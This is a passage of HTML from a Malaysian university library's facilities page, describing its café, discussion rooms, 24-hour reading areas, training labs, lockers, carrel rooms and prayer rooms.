icon-magnifier" aria-hidden="true" role="img"></i></a></li></ul> <div id="mobile-menu-search" class="clr"> <form aria-label="Search this website" method="get" action="https://www.ukm.my/ptsl/" class="mobile-searchform"> <input aria-label="Insert search query" value="" class="field" id="ocean-mobile-search-2" type="search" name="s" autocomplete="off" placeholder="Search" /> <button aria-label="Submit search" type="submit" class="searchform-submit"> <i class=" icon-magnifier" aria-hidden="true" role="img"></i> </button> <input type="hidden" name="lang" value="en" /> </form> </div><!-- .mobile-menu-search --> </nav> </div> </header><!-- #site-header --> <main id="main" class="site-main clr" role="main"> <div data-elementor-type="wp-page" data-elementor-id="256" class="elementor elementor-256"> <section class="elementor-section elementor-top-section elementor-element elementor-element-39e5171 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="39e5171" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e486604" data-id="e486604" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-9725744 cpel-switcher--align-right cpel-switcher--layout-horizontal elementor-widget elementor-widget-polylang-language-switcher" data-id="9725744" data-element_type="widget" data-widget_type="polylang-language-switcher.default"> <div class="elementor-widget-container"> <nav class="cpel-switcher__nav"><ul class="cpel-switcher__list"><li class="cpel-switcher__lang"><a lang="ms-MY" hreflang="ms-MY" href="https://www.ukm.my/ptsl/?page_id=757&lang=ms"><span class="cpel-switcher__name">Bahasa Melayu</span></a></li></ul></nav> </div> </div> </div> </div> </div> </section> <header class="elementor-section elementor-top-section elementor-element elementor-element-6c751c94 elementor-section-height-min-height elementor-section-content-middle elementor-reverse-mobile elementor-section-items-stretch elementor-section-boxed elementor-section-height-default" data-id="6c751c94" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-13903c1f" data-id="13903c1f" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-f2c7b17" data-id="f2c7b17" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-dccffd2" data-id="dccffd2" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-db79367 elementor-widget elementor-widget-image" data-id="db79367" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img fetchpriority="high" decoding="async" width="839" height="404" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih.png" class="attachment-large size-large wp-image-235" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih.png 839w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih-300x144.png 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/UKM_logo_4C_teks-putih-768x370.png 768w" sizes="(max-width: 839px) 100vw, 839px" /> </div> </div> </div> </div> </div> </header> <section class="elementor-section elementor-top-section elementor-element elementor-element-605e9ba elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="605e9ba" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7084650" data-id="7084650" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-72dd1ac elementor-widget elementor-widget-heading" data-id="72dd1ac" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">OUR FACILITIES</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-b2ae09b elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="b2ae09b" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-bae514b" data-id="bae514b" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-d9369fa elementor-widget elementor-widget-heading" data-id="d9369fa" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Café</h2> </div> </div> <div class="elementor-element elementor-element-c9b3db5 elementor-widget elementor-widget-text-editor" data-id="c9b3db5" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">Refreshment is provided at café located at Tun Seri Lanang foyer. Clients can have a break to enjoy food and drinks at the café due to no food and drink policy in the library.</span></p> </div> </div> <div class="elementor-element elementor-element-a5cd316 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="a5cd316" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-584eac6" data-id="584eac6" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-a5e18eb elementor-widget elementor-widget-image" data-id="a5e18eb" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/CAFE-2_1-1024x683.jpg" class="attachment-large size-large wp-image-895" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/CAFE-2_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/CAFE-2_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/CAFE-2_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/CAFE-2_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/CAFE-2_1-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-8e70110 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="8e70110" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-dc10d23" data-id="dc10d23" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-aa0c25f elementor-widget elementor-widget-heading" data-id="aa0c25f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Anjung Ilmu PTSL</h2> </div> </div> <div class="elementor-element elementor-element-2403cca elementor-widget elementor-widget-text-editor" data-id="2403cca" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">Anjung Ilmu PTSL can be used by all library clients. It provides two (2) discussion rooms that can accommodate eight (8) clients for every room and twelve (12) carrel desks equipped with power sources and Wi-fi.</span></p> </div> </div> <div class="elementor-element elementor-element-e855cec elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="e855cec" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-43b9a31" data-id="43b9a31" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-cb81a6c elementor-widget elementor-widget-heading" data-id="cb81a6c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Anjung Pro-Canselor Tun Ahmad Sarji</h2> </div> </div> <div class="elementor-element elementor-element-edcb90c elementor-widget elementor-widget-text-editor" data-id="edcb90c" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">It is located at Level 4 and placed Tun Ahmad Sarji Special Collection. This space provides a spacious reading area and suitable for discussion. <a href="https://docs.google.com/presentation/d/e/2PACX-1vSee4o_0Hn9G1xmry68Lx3V7jmBv0mIaEOVDc7YcpGw-PSf58-u4y8vQR2V4oxWB69rPyeTvtdUoRiw/pub?start=false&loop=false&delayms=3000">Click here for more info</a></span></p> </div> </div> <div class="elementor-element elementor-element-ec74dd9 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="ec74dd9" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-ce5aa0b elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ce5aa0b" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-4c813f5" data-id="4c813f5" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-9da5f65 elementor-widget elementor-widget-image" data-id="9da5f65" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A9140_1-1024x683.jpg" class="attachment-large size-large wp-image-896" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A9140_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A9140_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A9140_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A9140_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A9140_1-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-b6f41c9" data-id="b6f41c9" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-acbf291 elementor-widget elementor-widget-heading" data-id="acbf291" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Abdul Aziz Shaik Mydin 24 Hours Area</h2> </div> </div> <div class="elementor-element elementor-element-e6e253f elementor-widget elementor-widget-text-editor" data-id="e6e253f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">This area is located at Level 4 next to the Reference Collection . It can also be accessed via Jalan Lingkungan Ilmu. It has a spacious reading area and is equipped with Wi-fi coverage. Kwik-print service is also provided in this area. <strong><a href="https://docs.google.com/presentation/d/e/2PACX-1vSee4o_0Hn9G1xmry68Lx3V7jmBv0mIaEOVDc7YcpGw-PSf58-u4y8vQR2V4oxWB69rPyeTvtdUoRiw/pub?start=false&loop=false&delayms=3000">Click here for more info</a></strong></span></p> </div> </div> <div class="elementor-element elementor-element-394cc2e elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="394cc2e" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-c27e5e3 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="c27e5e3" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-c9fefc1" data-id="c9fefc1" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-378b8a7 elementor-widget elementor-widget-heading" data-id="378b8a7" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Tun Seri Lanang 24 Hours Reading Area</h2> </div> </div> <div class="elementor-element elementor-element-5dcce94 elementor-widget elementor-widget-text-editor" data-id="5dcce94" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">This area is located at Tun Seri Lanang Foyer and it provides spacious reading area. Library clients can make use of this space for discussion because they are not allowed to make discussion in reading area unless in discussion rooms. Vending machine and Wi-Fi are also provided in this area.</span></p> </div> </div> <div class="elementor-element elementor-element-5341447 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="5341447" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-a068e95" data-id="a068e95" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-e834fc3 elementor-widget elementor-widget-heading" data-id="e834fc3" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Training Lab</h2> </div> </div> <div class="elementor-element elementor-element-07b99a9 elementor-widget elementor-widget-text-editor" data-id="07b99a9" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">The training lab can accommodate 35 clients at one time and is located at Level 4, User Education Unit. There is another training lab at siber@ptsl that can accommodate 40 </span><span style="font-weight: 400;">clients</span><span style="font-weight: 400;"> at one time. User education and information skill courses are carried out at these labs.</span></p> </div> </div> <div class="elementor-element elementor-element-8151fad elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="8151fad" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-31be93f elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="31be93f" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-d6198d5" data-id="d6198d5" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-70d6212 elementor-widget elementor-widget-heading" data-id="70d6212" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Discussion Rooms</h2> </div> </div> <div class="elementor-element elementor-element-bed54e3 elementor-widget elementor-widget-text-editor" data-id="bed54e3" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">There are eighteen (18) discussion rooms, three (3) are available at Level 4, ten (10) are available at Level 3 and Level five (5) are available at Level 2. These rooms are free of charge. Registration can be done online via discussion rooms booking system (drbs.ukm.my). Library clients can get the discussion room key at the counter Level 4 of respective levels.</span></p> </div> </div> <div class="elementor-element elementor-element-80eb509 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="80eb509" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-698166a" data-id="698166a" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b8ccb6a elementor-widget elementor-widget-image" data-id="b8ccb6a" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1024x683.jpg" class="attachment-large size-large wp-image-900" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-0983dea elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="0983dea" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-e8ccfbd" data-id="e8ccfbd" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b2bbbea elementor-widget elementor-widget-heading" data-id="b2bbbea" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Self-check Machine</h2> </div> </div> <div class="elementor-element elementor-element-6821ee6 elementor-widget elementor-widget-text-editor" data-id="6821ee6" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">The library provides one (1) self-check machine for borrowing and returning books. This machine is located at Level 4.</span></p> </div> </div> <div class="elementor-element elementor-element-db18480 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="db18480" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-ab88b63" data-id="ab88b63" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-12c8f8c elementor-widget elementor-widget-heading" data-id="12c8f8c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Reading Area</h2> </div> </div> <div class="elementor-element elementor-element-84d22e7 elementor-widget elementor-widget-text-editor" data-id="84d22e7" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">The library provides </span><span style="font-weight: 400;">a</span><span style="font-weight: 400;"> reading area that can accommodate 1,633 clients at one time.</span></p> </div> </div> <div class="elementor-element elementor-element-9a9a7e1 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="9a9a7e1" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-5a18a00 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5a18a00" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-4422d59" data-id="4422d59" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b8b9ff4 elementor-widget elementor-widget-image" data-id="b8b9ff4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0245_1-1024x683.jpg" class="attachment-large size-large wp-image-901" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0245_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0245_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0245_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0245_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0245_1-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-705f811" data-id="705f811" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-8c48748 elementor-widget elementor-widget-heading" data-id="8c48748" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Sanggar Ilmu</h2> </div> </div> <div class="elementor-element elementor-element-e062503 elementor-widget elementor-widget-text-editor" data-id="e062503" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">This facility can be used for </span><span style="font-weight: 400;">the</span><span style="font-weight: 400;"> library’s official events and can accommodate around 150 people at one time. It is located at the User Education Unit, Level 4.</span></p> </div> </div> <div class="elementor-element elementor-element-2c310a8 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="2c310a8" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-dcbfb01 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="dcbfb01" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-fd97a0f" data-id="fd97a0f" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-794e86b elementor-widget elementor-widget-heading" data-id="794e86b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Locker</h2> </div> </div> <div class="elementor-element elementor-element-e52222c elementor-widget elementor-widget-text-editor" data-id="e52222c" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">The library provides three (3) methods of locker rental:</span></p><ul><li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Free of charge self-service lockers</span></li><li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Monthly rental locked lockers with RM5.00 rental fee and RM15.00 deposit</span></li><li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Free of charge daily lockers and can be registered at Checkout Counter, Level 4</span></li></ul> </div> </div> <div class="elementor-element elementor-element-0f5ef12 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="0f5ef12" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-44d4d35" data-id="44d4d35" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-260b98d elementor-widget elementor-widget-heading" data-id="260b98d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Room for Disabled Clients</h2> </div> </div> <div class="elementor-element elementor-element-ea72db1 elementor-widget elementor-widget-text-editor" data-id="ea72db1" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">It provides basic facilities for visually impaired clients and </span><span style="font-weight: 400;">is accessible</span><span style="font-weight: 400;">/located at Level 4. This room provide</span><span style="font-weight: 400;">s</span><span style="font-weight: 400;"> one (1) computer equipped with JAWS software.</span></p> </div> </div> <div class="elementor-element elementor-element-5319333 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="5319333" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-f440645 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="f440645" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-12d4cf9" data-id="12d4cf9" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-element elementor-element-e03dfa0 elementor-widget elementor-widget-heading" data-id="e03dfa0" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">siber@ptsl</h2> </div> </div> <div class="elementor-element elementor-element-0b81e5f elementor-widget elementor-widget-text-editor" data-id="0b81e5f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">Library clients can access the Internet including online databases and e-mail. CD-ROM, typing and printing services are also available </span><span style="font-weight: 400;">on this premise</span><span style="font-weight: 400;">.</span></p> </div> </div> <div class="elementor-element elementor-element-1bfa55e elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="1bfa55e" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-1e15152" data-id="1e15152" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-4437e98 elementor-widget elementor-widget-image" data-id="4437e98" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="1024" height="683" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0454_1-1024x683.jpg" class="attachment-large size-large wp-image-902" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0454_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0454_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0454_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0454_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A0454_1-2048x1365.jpg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-694fe64 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="694fe64" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-c4c3800" data-id="c4c3800" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-261a0f1 elementor-widget elementor-widget-heading" data-id="261a0f1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Carrel Rooms</h2> </div> </div> <div class="elementor-element elementor-element-afcfa89 elementor-widget elementor-widget-text-editor" data-id="afcfa89" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">Carrel rooms are located at Level 3. There are two (2) types of usage for carrel rooms. First, carrel rooms with daily-basis usage and </span><span style="font-weight: 400;">are </span><span style="font-weight: 400;">free of charge. Second, carrel rooms that can be rented monthly. The rental rate is RM10.00 with a deposit of RM5.00 </span><span style="font-weight: 400;">per rental</span><span style="font-weight: 400;">. The process of registration and renting</span><span style="font-weight: 400;"> is to be made</span><span style="font-weight: 400;"> at </span><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">Checkout Counter, Level 4.</span></p> </div> </div> <div class="elementor-element elementor-element-ccfd394 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="ccfd394" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-361f16c" data-id="361f16c" data-element_type="column" data-settings="{"background_background":"classic"}"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-3d7b198 elementor-widget elementor-widget-heading" data-id="3d7b198" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Prayer Rooms</h2> </div> </div> <div class="elementor-element elementor-element-b60c037 elementor-widget elementor-widget-text-editor" data-id="b60c037" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">The Surau (prayer room) of Tun Seri Lanang is located at Level 2 (outside </span><span style="font-weight: 400;">the </span><span style="font-weight: 400;">library compound). There is also one prayer room inside </span><span style="font-weight: 400;">the 